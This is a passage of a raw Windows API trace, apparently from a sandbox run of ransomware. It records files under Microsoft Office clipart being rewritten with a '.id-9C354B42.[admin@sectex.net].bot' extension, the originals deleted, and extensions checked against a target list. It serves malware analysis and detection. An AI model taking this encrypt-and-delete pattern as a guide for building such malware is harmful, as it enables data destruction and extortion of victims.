	[0163.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0163.256] GetLastError () returned 0x0
	[0163.257] ReadFile (in: hFile=0x37c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x45cb, lpOverlapped=0x0) returned 1
	[0163.258] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x45d0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x45d0, lpOverlapped=0x0) returned 1
	[0163.259] ReadFile (in: hFile=0x37c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.259] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.260] SetEndOfFile (hFile=0x3f0) returned 1
	[0163.260] CloseHandle (hObject=0x3f0) returned 1
	[0163.260] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.260] SetEndOfFile (hFile=0x37c) returned 1
	[0163.265] CloseHandle (hObject=0x37c) returned 1
	[0163.265] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.265] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145373.jpg")) returned 1
	[0163.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63
	[0163.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63
	[0163.266] lstrlenW (lpString=".doc") returned 4
	[0163.266] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.266] lstrlenW (lpString=".docx") returned 5
	[0163.266] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1
	[0163.266] lstrlenW (lpString=".pdf") returned 4
	[0163.266] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.266] lstrlenW (lpString=".xls") returned 4
	[0163.266] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.266] lstrlenW (lpString=".xlsx") returned 5
	[0163.266] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1
	[0163.266] lstrlenW (lpString=".ppt") returned 4
	[0163.266] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63
	[0163.266] lstrlenW (lpString=".zip") returned 4
	[0163.266] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.266] lstrlenW (lpString=".rar") returned 4
	[0163.266] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.266] lstrlenW (lpString=".bz2") returned 4
	[0163.267] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.267] lstrlenW (lpString=".7z") returned 3
	[0163.267] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63
	[0163.267] lstrlenW (lpString=".dbf") returned 4
	[0163.267] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63
	[0163.267] lstrlenW (lpString=".1cd") returned 4
	[0163.267] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63
	[0163.267] lstrlenW (lpString=".jpg") returned 4
	[0163.267] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63
	[0163.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63
	[0163.267] lstrlenW (lpString=".doc") returned 4
	[0163.267] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.267] lstrlenW (lpString=".docx") returned 5
	[0163.267] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1
	[0163.267] lstrlenW (lpString=".pdf") returned 4
	[0163.267] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.267] lstrlenW (lpString=".xls") returned 4
	[0163.267] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.267] lstrlenW (lpString=".xlsx") returned 5
	[0163.267] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1
	[0163.267] lstrlenW (lpString=".ppt") returned 4
	[0163.267] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63
	[0163.267] lstrlenW (lpString=".zip") returned 4
	[0163.267] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.267] lstrlenW (lpString=".rar") returned 4
	[0163.267] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.267] lstrlenW (lpString=".bz2") returned 4
	[0163.267] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.267] lstrlenW (lpString=".7z") returned 3
	[0163.268] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63
	[0163.268] lstrlenW (lpString=".dbf") returned 4
	[0163.268] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63
	[0163.268] lstrlenW (lpString=".1cd") returned 4
	[0163.268] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 63
	[0163.268] lstrlenW (lpString=".jpg") returned 4
	[0163.268] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.268] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.268] lstrlenW (lpString="J0145669.JPG") returned 12
	[0163.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145669.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.268] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=31850) returned 1
	[0163.269] CloseHandle (hObject=0x37c) returned 1
	[0163.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145669.jpg")) returned 0x20
	[0163.269] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145669.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145669.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.269] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.269] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145669.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0163.270] GetLastError () returned 0x0
	[0163.270] ReadFile (in: hFile=0x37c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x7c6a, lpOverlapped=0x0) returned 1
	[0163.272] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x7c70, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x7c70, lpOverlapped=0x0) returned 1
	[0163.274] ReadFile (in: hFile=0x37c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.274] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.274] SetEndOfFile (hFile=0x3f0) returned 1
	[0163.274] CloseHandle (hObject=0x3f0) returned 1
	[0163.274] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.274] SetEndOfFile (hFile=0x37c) returned 1
	[0163.276] CloseHandle (hObject=0x37c) returned 1
	[0163.497] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.497] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145669.jpg")) returned 1
	[0163.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned 63
	[0163.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned 63
	[0163.498] lstrlenW (lpString=".doc") returned 4
	[0163.498] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.498] lstrlenW (lpString=".docx") returned 5
	[0163.498] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1
	[0163.498] lstrlenW (lpString=".pdf") returned 4
	[0163.498] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.498] lstrlenW (lpString=".xls") returned 4
	[0163.498] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.498] lstrlenW (lpString=".xlsx") returned 5
	[0163.499] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1
	[0163.499] lstrlenW (lpString=".ppt") returned 4
	[0163.499] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned 63
	[0163.499] lstrlenW (lpString=".zip") returned 4
	[0163.499] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.499] lstrlenW (lpString=".rar") returned 4
	[0163.499] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.499] lstrlenW (lpString=".bz2") returned 4
	[0163.499] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.499] lstrlenW (lpString=".7z") returned 3
	[0163.499] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned 63
	[0163.499] lstrlenW (lpString=".dbf") returned 4
	[0163.499] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned 63
	[0163.499] lstrlenW (lpString=".1cd") returned 4
	[0163.499] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned 63
	[0163.499] lstrlenW (lpString=".jpg") returned 4
	[0163.499] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned 63
	[0163.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned 63
	[0163.499] lstrlenW (lpString=".doc") returned 4
	[0163.499] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.499] lstrlenW (lpString=".docx") returned 5
	[0163.499] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1
	[0163.499] lstrlenW (lpString=".pdf") returned 4
	[0163.499] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.499] lstrlenW (lpString=".xls") returned 4
	[0163.499] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.499] lstrlenW (lpString=".xlsx") returned 5
	[0163.499] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1
	[0163.499] lstrlenW (lpString=".ppt") returned 4
	[0163.500] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned 63
	[0163.500] lstrlenW (lpString=".zip") returned 4
	[0163.500] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.500] lstrlenW (lpString=".rar") returned 4
	[0163.500] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.500] lstrlenW (lpString=".bz2") returned 4
	[0163.500] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.500] lstrlenW (lpString=".7z") returned 3
	[0163.500] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned 63
	[0163.500] lstrlenW (lpString=".dbf") returned 4
	[0163.500] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned 63
	[0163.500] lstrlenW (lpString=".1cd") returned 4
	[0163.500] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned 63
	[0163.500] lstrlenW (lpString=".jpg") returned 4
	[0163.500] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.500] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0163.500] lstrlenW (lpString="J0149118.JPG") returned 12
	[0163.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149118.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.649] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=64802) returned 1
	[0163.649] CloseHandle (hObject=0x3e8) returned 1
	[0163.649] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149118.jpg")) returned 0x20
	[0163.662] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149118.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149118.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.663] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.663] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149118.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0163.663] GetLastError () returned 0x0
	[0163.663] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xfd22, lpOverlapped=0x0) returned 1
	[0163.676] WriteFile (in: hFile=0x1d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xfd30, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xfd30, lpOverlapped=0x0) returned 1
	[0163.679] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.679] WriteFile (in: hFile=0x1d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.680] SetEndOfFile (hFile=0x1d8) returned 1
	[0163.680] CloseHandle (hObject=0x1d8) returned 1
	[0163.680] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.680] SetEndOfFile (hFile=0x3c4) returned 1
	[0163.683] CloseHandle (hObject=0x3c4) returned 1
	[0163.683] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.683] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149118.jpg")) returned 1
	[0163.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned 63
	[0163.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned 63
	[0163.684] lstrlenW (lpString=".doc") returned 4
	[0163.684] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.684] lstrlenW (lpString=".docx") returned 5
	[0163.684] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0163.684] lstrlenW (lpString=".pdf") returned 4
	[0163.684] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.684] lstrlenW (lpString=".xls") returned 4
	[0163.684] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.684] lstrlenW (lpString=".xlsx") returned 5
	[0163.684] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0163.684] lstrlenW (lpString=".ppt") returned 4
	[0163.684] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned 63
	[0163.684] lstrlenW (lpString=".zip") returned 4
	[0163.684] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.684] lstrlenW (lpString=".rar") returned 4
	[0163.684] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.684] lstrlenW (lpString=".bz2") returned 4
	[0163.684] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.684] lstrlenW (lpString=".7z") returned 3
	[0163.685] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned 63
	[0163.685] lstrlenW (lpString=".dbf") returned 4
	[0163.685] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned 63
	[0163.685] lstrlenW (lpString=".1cd") returned 4
	[0163.685] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned 63
	[0163.685] lstrlenW (lpString=".jpg") returned 4
	[0163.685] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned 63
	[0163.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned 63
	[0163.685] lstrlenW (lpString=".doc") returned 4
	[0163.685] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0163.685] lstrlenW (lpString=".docx") returned 5
	[0163.685] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0163.685] lstrlenW (lpString=".pdf") returned 4
	[0163.685] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.685] lstrlenW (lpString=".xls") returned 4
	[0163.685] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.685] lstrlenW (lpString=".xlsx") returned 5
	[0163.685] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0163.685] lstrlenW (lpString=".ppt") returned 4
	[0163.685] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned 63
	[0163.685] lstrlenW (lpString=".zip") returned 4
	[0163.685] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.685] lstrlenW (lpString=".rar") returned 4
	[0163.685] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.685] lstrlenW (lpString=".bz2") returned 4
	[0163.685] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.685] lstrlenW (lpString=".7z") returned 3
	[0163.686] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned 63
	[0163.686] lstrlenW (lpString=".dbf") returned 4
	[0163.686] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned 63
	[0163.686] lstrlenW (lpString=".1cd") returned 4
	[0163.686] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned 63
	[0163.686] lstrlenW (lpString=".jpg") returned 4
	[0163.686] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.686] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.686] lstrlenW (lpString="J0151045.WMF") returned 12
	[0163.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151045.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.687] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=15464) returned 1
	[0163.687] CloseHandle (hObject=0x3c4) returned 1
	[0163.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151045.wmf")) returned 0x20
	[0163.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151045.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151045.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.687] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.687] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151045.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0163.688] GetLastError () returned 0x0
